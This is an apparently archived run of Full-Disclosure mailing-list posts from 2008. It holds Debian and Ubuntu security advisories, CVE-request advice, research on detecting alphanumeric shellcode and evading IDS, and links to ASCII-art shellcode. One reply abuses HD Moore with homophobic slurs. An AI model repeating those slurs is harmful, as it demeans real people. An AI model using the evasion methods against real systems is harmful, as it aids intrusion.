http://www.antiphishing.org/reports/behindPhishingWhitePaper.pdf [5] "Learning to Detect Phishing Emails" (contains a useful literature review) http://www.cs.cmu.edu/~sadeh/Publications/Small%20Selection/www07%20FI NAL%20SUBMISSION.pdf [6] "Evolution of Phishing Attacks" (mentions that filtering on the FROM field might be beneficial) http://www.antiphishing.org/Evolution%20of%20Phishing%20Attacks.pdf [7] shows a list similar to Millers' Miles http://www.ciphertrust.com/resources/statistics/phishing.php [8] "Phishing Activity Trends Report" states that the top 17 targetted companies account for 80% of all phish http://www.antiphishing.org/reports/apwg_report_August_2006.pdf [9] "Phishing Attacks: Analyzing Trends in 2006" (states that "the top 10 spoofed brands account for nearly 85% of phishing web sites") http://www.ceas.cc/2007/papers/paper-34.pdf [10] "Anti-Phishing Best Practices for ISPs and Mailbox Providers" (contains a useful literature review) http://www.antiphishing.org/reports/bestpracticesforisps.pdf PS no I'm not trolling I've been using this approach for 6 months or so and it works great for me, so I thought I'd share it ... PPS "80% of all phish target 1 of 20 or less companies" DOES NOT MEAN that 20% of phish target 2 companies or more, each phish targets 1 company, but that 1 company is, 80% of the time, in a list of 20 companies that are commonly phished. And the list of companies might be even smaller than 20, depending on whose stats you're reading. --- Stuart Udall stuart at at cyberdelix.dot net - http://www.cyberdelix.net/ --- * Origin: lsi: revolution through evolution (192:168/0.2) From wrowe at rowe-clan.net Fri Aug 1 21:39:18 2008 From: wrowe at rowe-clan.net (William A. Rowe, Jr.) Date: Fri, 01 Aug 2008 15:39:18 -0500 Subject: [Full-disclosure] how to request a cve id? In-Reply-To: References: Message-ID: <48937476.1050007@rowe-clan.net> Steven M. Christey wrote: > CVE requests can be sent to cve at mitre.org or to me directly. My PGP > key is below, or accessible from the MIT public key server. > Alternately, you can request them from Candidate Numbering Authorities > (CNAs) which include the security teams at Red Hat, Microsoft, and > Debian, or third-party coordinators including iDefense and CERT/CC. > > The amount of information you need to provide can vary and is somewhat > negotiable. We need to be sure how many CVEs to assign. > > Naturally, there is no charge for CVE requests. We encourage people > to try to coordinate with the vendor, since the quality of information > almost always suffers if you don't do so. I'd like to expand on Steven's comments; it is usually best to obtain that CVE from the vendor/project, if they already participate in Mitre. This ensures that you are not creating a duplicate ID. Of course if they do not participate, you'll need to follow Steven's directions above. If they do participate, it ensures that duplicate CVE's won't need to be discarded. Where your vulnerability overlaps a prior report, you should be told which CVE applies to your report. It may be best where you have a cross project/vendor vulnerability to simply request one first, and then notify each project/vendor affected of the specific CVE you have allocated at the time you notify them of the vulnerability. From xploitable at gmail.com Sun Aug 3 22:36:09 2008 From: xploitable at gmail.com (n3td3v) Date: Sun, 3 Aug 2008 22:36:09 +0100 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> Message-ID: <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> On Sun, Aug 3, 2008 at 9:43 PM, solemn wrote: > lol. i <3s u, n3td3v. > Yes, they are both a bunch of fucking faggots. He is an elite haxor after all, why would he leave the DNS for his own company vulnerable, or did he over look something so obvious to check before releasing the exploit to the wild, or is he not as elite as he makes out to be and actually didn't think to check DNS infrastructure linked to his company. The faggot tried to say nothing at his company was compromsied so he has nothing to be blamed for, no HD Moore was a fucking faggot who should have checked out AT&T wasn't vulnerable. He has no excuse for what happened, he is a global international hacker leading the release of the exploit code, its his entire responsibility to make sure his company is secure, even if the servers that were vulnerable were owned by AT&T. The AT&T servers are still on his watch, because he is responsible for the global international release of the exploit code. So if HD Moore thinks he's off the hook for his company's website getting hacked via AT&T, think again, you were hacked HD Moore and its all your fucking fault. Fucking lamer. Don't go talking shit on your blog that it had absolutely nothing to do with you, every single server on the internet that gets compromised because of your irresponsible showing off by releasing the exploit code when asked not to is all your fucking fault. Look, mommy and daddy I built a sandcastle, come look at what I built! Thats the fucking mentality you had when you released the exploit code without the permission of the security industry you fat American Austin Texas fuckhead. All the best, n3td3v > On Sat, Jul 26, 2008 at 1:19 PM, n3td3v wrote: >> Joel Hruska from Ars Technica has said HD Moore and I)ruid are >> "enterprising little children". >> >> >> New DNS exploit now in the wild and having a blast >> http://arstechnica.com/news.ars/post/20080726-new-dns-exploit-now-in-the-wild-and-having-a-blast.html >> >> >> All the best, >> >> n3td3v >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > From Valdis.Kletnieks at vt.edu Mon Aug 4 04:44:26 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sun, 03 Aug 2008 23:44:26 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: Your message of "Sun, 03 Aug 2008 22:36:09 BST." <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> Message-ID: <15949.1217821466@turing-police.cc.vt.edu> On Sun, 03 Aug 2008 22:36:09 BST, n3td3v said: > He has no excuse for what happened, he is a global international > hacker leading the release of the exploit code, its his entire > responsibility to make sure his company is secure, even if the servers > that were vulnerable were owned by AT&T. And how, *exactly*, is he supposed to fix servers that aren't under his administrative control? Tell you what - the next time that the company that you get Internet access from has an issue, why don't you go ahead and fix it for them, and let us know how that all works out, 'kay? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080803/b5679411/attachment.bin From thijs at debian.org Mon Aug 4 10:00:29 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Mon, 4 Aug 2008 11:00:29 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1627-1] New opensc packages fix smart card vulnerability Message-ID: <20080804090029.BA349327609@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1627-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst August 04, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : opensc Vulnerability : programming error Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-2235 Chaskiel M Grundman discovered that opensc, a library and utilities to handle smart cards, would initialise smart cards with the Siemens CardOS M4 card operating system without proper access rights. This allowed everyone to change the card's PIN. With this bug anyone can change a user PIN without having the PIN or PUK or the superusers PIN or PUK. However it can not be used to figure out the PIN. If the PIN on your card is still the same you always had, there's a resonable chance that this vulnerability has not been exploited. This vulnerability affects only smart cards and USB crypto tokens based on Siemens CardOS M4, and within that group only those that were initialised with OpenSC. Users of other smart cards and USB crypto tokens, or cards that have been initialised with some software other than OpenSC, are not affected. After upgrading the package, running pkcs15-tool -T will show you whether the card is fine or vulnerable. If the card is vulnerable, you need to update the security setting using: pkcs15-tool -T -U For the stable distribution (etch), this problem has been fixed in version 0.11.1-2etch1. For the unstable distribution (sid), this problem has been fixed in version 0.11.4-4. We recommend that you upgrade your opensc 0.11.1-2etch1 package and check your card(s) with the command described above. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1.orig.tar.gz Size/MD5 checksum: 1263611 94ce00a6bda38fac10ab06f5d5d1a8c3 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1.diff.gz Size/MD5 checksum: 57052 1b58c5d799d40f645ef3b132c49ab383 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1.dsc Size/MD5 checksum: 780 f80a316bdbee0c5132a6ac2200a864ca alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 296980 f58a8caa8c2df06057dc0f404798626d http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 204944 25f4e7077d8e92da0e9f9a8c7a9f243c http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 727608 12fcf66320b622e2f6887404709b5ab0 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 1077824 44c113c23321766542c653f23cfa57a6 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 508220 5853671ce35f9f9d3d9160bdbc715267 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 576890 ae517b1e8a6e10a0d284c86e470128a9 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 281184 7685b2c13ea0cfe3314d13c1012ead33 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 483262 ea2c9a29a9983d02709fe3fdab3639c7 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 1069104 5c79b0e8705ed7c74eead212f3dff5fd http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 199942 68a206307bc51ef6f0e3354f77c7b689 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_arm.deb Size/MD5 checksum: 529872 6fcea50e6d9f2798e57b7a95a9d1b32b http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_arm.deb Size/MD5 checksum: 269136 4d0f5d069408f36662eea22a7162cc12 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_arm.deb Size/MD5 checksum: 450838 2f2a61d387035578e9cd2b470c15f3f5 http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_arm.deb Size/MD5 checksum: 187912 48c8db0926a3b5086edd3858a7b3464f http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_arm.deb Size/MD5 checksum: 1012008 b2bcc27df4dd377837bc09187226728d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_hppa.deb Size/MD5 checksum: 285644 720de4261275a635e21621a8608c2118 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_hppa.deb Size/MD5 checksum: 623714 21e39736d446b2f4050e17e4c6a710f7 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_hppa.deb Size/MD5 checksum: 512546 62a5924897c6a1758ab692497bc2a8c2 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_hppa.deb Size/MD5 checksum: 1038638 8600b17317f3f078c4a4445a1a37bba3 http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_hppa.deb Size/MD5 checksum: 205342 998bf77a44c1c1bf1be8ec9dc37b198e i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_i386.deb Size/MD5 checksum: 537914 6e8db96c6e3de77c23718d708e7747d2 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_i386.deb Size/MD5 checksum: 1019192 bddb42d3014a93863baf1fb4e48bcfb7 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_i386.deb Size/MD5 checksum: 453524 507bcea36e51a9631fccdfc5044661c9 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_i386.deb Size/MD5 checksum: 269964 512b8c22aa541eaf40bdc3d3e7b2f237 http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_i386.deb Size/MD5 checksum: 189412 7a5548e7211d1f8042b8708f430a92f7 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_ia64.deb Size/MD5 checksum: 206076 3e8b1a0418c913959e2a48e34fed06f3 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_ia64.deb Size/MD5 checksum: 620222 a1165f22cddd56615544ce237392eda4 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_ia64.deb Size/MD5 checksum: 1062136 c2eeeef002ad6571456d92fa1564e1b2 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_ia64.deb Size/MD5 checksum: 769856 6a3804060f63b820871b205497fc9043 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_ia64.deb Size/MD5 checksum: 354050 3d2e9f1faf7b2c544e1318826b0491ed mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_mips.deb Size/MD5 checksum: 282924 3026353e8112e756b5e9e8514841af67 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_mips.deb Size/MD5 checksum: 1082412 858fbe501e5e72f6067364b5dff7195b http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_mips.deb Size/MD5 checksum: 195460 4ebf2a7f1c25e2b7bc17e2299b95b2d2 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_mips.deb Size/MD5 checksum: 458348 82a2b52416de1a8908bf04f0deb62db0 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_mips.deb Size/MD5 checksum: 632910 0b4d7ef4c89e980879921adc2392874b mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_mipsel.deb Size/MD5 checksum: 458278 0902a8dde43e0bcecb9d966e80e00291 http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_mipsel.deb Size/MD5 checksum: 194500 2ae036fbea0d0020437d0e990536b3c6 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_mipsel.deb Size/MD5 checksum: 1060820 bf0dd90ca962d53dd4789984a01cc7ab http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_mipsel.deb Size/MD5 checksum: 629236 98ab63af49e09c44ee26ad83e980f29a http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_mipsel.deb Size/MD5 checksum: 284040 f12e0c356c392d0170d285f8666eeef0 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_powerpc.deb Size/MD5 checksum: 1084198 9966426b32b6a6747d7f79f00ade7344 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_powerpc.deb Size/MD5 checksum: 294672 a313b6186b60d0e3c7bd37f0d3738ae0 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_powerpc.deb Size/MD5 checksum: 473704 b5c40173686be092cf90fcfccc5763e7 http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_powerpc.deb Size/MD5 checksum: 205022 99ab0a4885629efe28af1d7046b504dc http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_powerpc.deb Size/MD5 checksum: 599442 eee9e4fab2c56dcdeaa04d772196492c s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_s390.deb Size/MD5 checksum: 217036 cf802e53d194f69717ce8721a7ee6f9a http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_s390.deb Size/MD5 checksum: 279104 31883cd04da9c5706544fe4c5e360a4f http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_s390.deb Size/MD5 checksum: 1050042 c448e71485f71b7b286726a800192d36 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_s390.deb Size/MD5 checksum: 485444 209814eff30c6196f8c1e0120815e332 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_s390.deb Size/MD5 checksum: 552702 4ffd552997a712a682d3998875223896 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_sparc.deb Size/MD5 checksum: 442292 cdc730715c6dd526f5157a77aa3a0994 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_sparc.deb Size/MD5 checksum: 268136 b2075866922a7287c4a688ce2e0db066 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_sparc.deb Size/MD5 checksum: 544478 4027cd3c2d9c237db8071aa219bc33eb http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_sparc.deb Size/MD5 checksum: 193598 c858bf19a633cb2581507a531f286e9d http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_sparc.deb Size/MD5 checksum: 967876 a663e88eb2016cca21a8a13a495e36da These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSJbFLGz0hbPcukPfAQI/SwgAg5g7V6BUSFidcFqJpZBJSH+VFN5UObtB x1Y8VIt+sVNGgPmxxb6Ja52iIATRJc/GyXcsjniBtEu0aVJjbfiTp/Pts/sbQjHI 63/n+Dsk0j6faRkZY94fzF6tOWZkHpaI+P+MxONUH7aIZUka+WhlG/vVcW9XUaa7 GtTMTWC6ZIN6N8XKsU2sqAYcKFHdGvz5GhcYWcaEYFAbWf4ABges/fCFiSfS7Bew mWMRzS9B2sylWqEbsjrIDi/XyXasbaBDlyCroxQB80RMW7gy73TEwOhd/J4R8nXE INUDTwPAP67kaZhOsYFsgvljt8sGpOXRLuPhAoqc/QVdjzCHA4ObSA== =wMdO -----END PGP SIGNATURE----- From Avraham.Schneider at aladdin.com Mon Aug 4 11:02:26 2008 From: Avraham.Schneider at aladdin.com (Avraham Moshe Schneider) Date: Mon, 4 Aug 2008 13:02:26 +0300 Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection Message-ID: <6C653A611ACD78469EA1DF7954A51ED1042331DC@extlv102.eAladdin.org> Hello Full-Disclosure, I'd like to share with you some of the work I've done researching alphanumeric shellcode detection. Although alphanumeric shellcode encoding isn't new, I believe this post will present you with some value. There are two main reasons why someone might use an alphanumeric shellcode encoder - 1. To encode bytes not allowed by the vulnerable application 2. To evade detection by an Intrusion Detection system. Even though the first case is arguably the more common occurrence, and even though there might be more room for improvement there, I have focused my work on the second. You will find attached an alphanumeric shellcode encoder that makes the decoder routine detection more difficult. It has some cool new features, but again, the purpose of this post is not that much about the new decoder, but rather on the subject of using alphanumeric shellcodes to evade detection, and investigating generic detection possibilities. I'm aware of several methods for detecting shellcode executing attacks: - Detect attacks by understanding the vulnerable protocol fields/lengths and checking the supplied values This is straight forward but has little (or nothing) to do with alphanumeric shellcode encoding. The IDS is updated with new signatures for the new threats. It would be hard for an attacker to evade detection if the IDS has properly added a signature against the vulnerability itself, and the IDS is not vulnerable to evasion attacks at a lower protocol layer. The downside is, you can only detect what you know, so the IDS has to be constantly updated with signatures for the new threats. - Detect attacks by searching for known shellcode patterns This is also straight forward. The IDS is updated with signatures for all known shellcode patterns. The advantage of doing this is that due to the skills required and the time consuming process involved, the attacker is less likely to implement his own custom shellcode. This allows the IDS to detect unknown attacks without updating it with new signatures. Of course it does not remove the IDS vendor from the responsibility of adding new signatures to detect new threats, but it adds another line of defense. I listed above a couple of cases for which attackers may need to encode their shellcode using an alphanumeric encoder. Evading this detection is one of them, and to counter that, we have yet another line of defense ??? - Detect attacks by searching for known encoded shellcode's decoder routine patterns Since the encoded shellcode must include a decoder routine that will be used to decode the encoded data (and then execute it), the IDS is updated with signatures for the known decoder routines. This adds an important value to the previous detection method ??? But it still leaves a hole - encoders that generate difficult to detect decoder routines (like the tool I have attached). Emulation, or profiling may be used to detect these generically, but since the IDS does not know where to start scanning, and since the IDS cannot perform these tests on all bytes of all streams (costly in terms of CPU), it may want to - - Detect attacks by searching for known shellcode's encoded data This requires updating the IDS with smart signatures that can decode alphanumeric streams and compare decoded data against known shellcode patterns. It requires updating the IDS with new decoding algorithms. Assuming the use of alphanumeric encoders/decoders and their limitation of using a limited instruction set, there is a difficulty of coming up with new encoding schemes and this detection method really adds a great value to the IDS. The previous shellcode encoder Matt Conover, Soren Macbeth and I wrote back in 2004 used a fixed key throughout the shellcode. It may seem that detecting the encoded data would be easy with a fixed key and a known shellcode pattern, but since you have 62 different keys to choose from (assuming alphanumeric char-set composes 0-9A-Za-z), you would need to check each known pattern against 62 different keys. In that sense, the previous work would be of greater use for an attacker to evade this detection method, but on the other hand, the previous mentioned detection method would detect the decoder routine, as it is not that stealthy. The presented decoder is IMO harder to detect yet detection of the encoded data is much simpler. The attacker would be faced with this tradeoff, and an IDS that implements all of the above techniques, would provide IMO good defense against known and unknown threats involving shellcode execution. There might be an encoding/decoding technique that does not exhibit this tradeoff, for example, appending a random fixed number of bytes between encoded data bytes that the decoder could skip. I haven't yet tried implementing this due to time constraints, but I believe it is possible. I have attached the new encoder/decoder code, as well as a function that may be used to scan alphanumeric strings. This function should not be used in an IDS product for the following reasons: 1. It uses a naive search algorithm. 2. It scans a buffer and not a stream. 3. It rescans the entire buffer with each decoder. IMO, implementing a multi-pattern type Boyer-Moore algorithm, such as the one presented by Sun Wu and Udi Manber, is a very good IPS solution for the following reasons: 1. The number of skip bytes is double the pattern length. 2. Since we are looking for a known part of a known shellcode, we know the shellcode length - hence - 3. On a non-alphanumeric byte we can skip double the length of the shellcode minus the position of the pattern within the shellcode. (basically we can add the knowledge of the original shellcode length to the skip table) I have implemented a single pattern Boyer-Moore algorithm implementation that handles a file stream but as it does not satisfy the requirements listed above, and in order to reduce the size of the code I have not included it here. If you are interested, contact me privately. Also, please feel free to e-mail me with any questions or comments. I'd like to thank Matt Conover for reviewing my work and giving me good feedback. Regards, Avri ********************************************************************************************** The contents of this email and any attachments are confidential. It is intended for the named recipient(s) only. If you have received this email in error please notify the system manager or? the sender immediately and do not disclose the contents to anyone or make copies. ** eSafe scanned this email for viruses, vandals and malicious content ** ********************************************************************************************** -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: alnum_decoder_encoder.c Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/19069f91/attachment.c From berendjanwever at gmail.com Mon Aug 4 12:47:43 2008 From: berendjanwever at gmail.com (Berend-Jan Wever) Date: Mon, 4 Aug 2008 13:47:43 +0200 Subject: [Full-disclosure] ASCII Art shellcode Message-ID: <3fa2f5bb0808040447t411cc379pfe35f0cc0f7f8f39@mail.gmail.com> Hi all, I've put some more stuff online I created in the last two years; ASCII Art shellcode: http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Organic *http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Blocky* http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Julia As the name suggests, it is working shellcode that's also ASCII Art. They all use the same basic principle: a small decoder embeded into the first characters of the ASCII Art. After the decoder, the original shellcode is encoded into the remainder of the ASCII Art. When executed, the decoder decodes the original shellcode and runs it, similar to how my ALPHA2 alphanumeric shellcode works. If you are going to release an exploit, you might as well make it look good. Cheers, SkyLined -------------------------------------------------------------------------------------------------------- Berend-Jan Wever http://skypher.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/3e127a9a/attachment.html From jamie at canonical.com Mon Aug 4 14:46:45 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Mon, 4 Aug 2008 09:46:45 -0400 Subject: [Full-disclosure] [USN-626-2] Devhelp, Epiphany, Midbrowser and Yelp update Message-ID: <20080804134645.GA13344@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-626-2 August 04, 2008 devhelp, epiphany-browser, midbrowser, yelp update https://launchpad.net/bugs/253462 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: devhelp 0.19-1ubuntu1.8.04.3 epiphany-gecko 2.22.2-0ubuntu0.8.04.5 midbrowser 0.3.0rc1a-1~8.04.2 yelp 2.22.1-0ubuntu2.8.04.2 After a standard system upgrade you need to restart Devhelp, Epiphany, Midbrowser and Yelp to effect the necessary changes. Details follow: USN-626-1 fixed vulnerabilities in xulrunner-1.9. The changes required that Devhelp, Epiphany, Midbrowser and Yelp also be updated to use the new xulrunner-1.9. Original advisory details: A flaw was discovered in the browser engine. A variable could be made to overflow causing the browser to crash. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2785) Billy Rios discovered that Firefox and xulrunner, as used by browsers such as Epiphany, did not properly perform URI splitting with pipe symbols when passed a command-line URI. If Firefox or xulrunner were passed a malicious URL, an attacker may be able to execute local content with chrome privileges. (CVE-2008-2933) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.diff.gz Size/MD5: 31298 9c7bb3906f79ab2c1f190cbefb703f82 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.dsc Size/MD5: 1114 bb5bf149ce7b8df7a16d7ab7c411d5ed http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19.orig.tar.gz Size/MD5: 675357 3a9cb38f83d7f20391b19e305608f289 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.diff.gz Size/MD5: 41819 89fa0f8815e04a0f634241b6c1f364d3 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.dsc Size/MD5: 1589 61c107f668ad8b4aa25c398b0c93fe1d http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2.orig.tar.gz Size/MD5: 7126288 cdc44e20c2ebaba1fe71c1154030dcd9 http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.dsc Size/MD5: 1081 fcc8bc8330370aa9df477a6b6f6fb819 http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.tar.gz Size/MD5: 46625228 e35bc6b300ba8ba6795cc3c8544c1c70 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.diff.gz Size/MD5: 1268814 35076923ad47e759c7944548421dee51 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.dsc Size/MD5: 1230 bd4fda6dd2e3c57f2db67e635e805a5b http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1.orig.tar.gz Size/MD5: 1528478 e97a18f7e002d293394726004fc110b7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp-common_0.19-1ubuntu1.8.04.3_all.deb Size/MD5: 38486 95c5a3b17fd74b4dd632e7c8a2c559ec http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-data_2.22.2-0ubuntu0.8.04.5_all.deb Size/MD5: 3296778 b77676d76c4a5ba0728fca33aadc238a http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_2.22.2-0ubuntu0.8.04.5_all.deb Size/MD5: 115802 30f9179b2bbeb7fc0170ec9156deedd5 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5_all.deb Size/MD5: 49494 bb116eb3227198464792497dbf1b1fa3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_amd64.deb Size/MD5: 17026 5fd05c053b42d0ab1228e97953aa8775 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_amd64.deb Size/MD5: 100988 c8f2b1a6898df9a34715ed306ce0f28d http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_amd64.deb Size/MD5: 6702 35a0280af7c5ad62333b6ad64c612bd9 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_amd64.deb Size/MD5: 1948612 87efe42bb7facafb8f5c24ecb7d256ef http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_amd64.deb Size/MD5: 579338 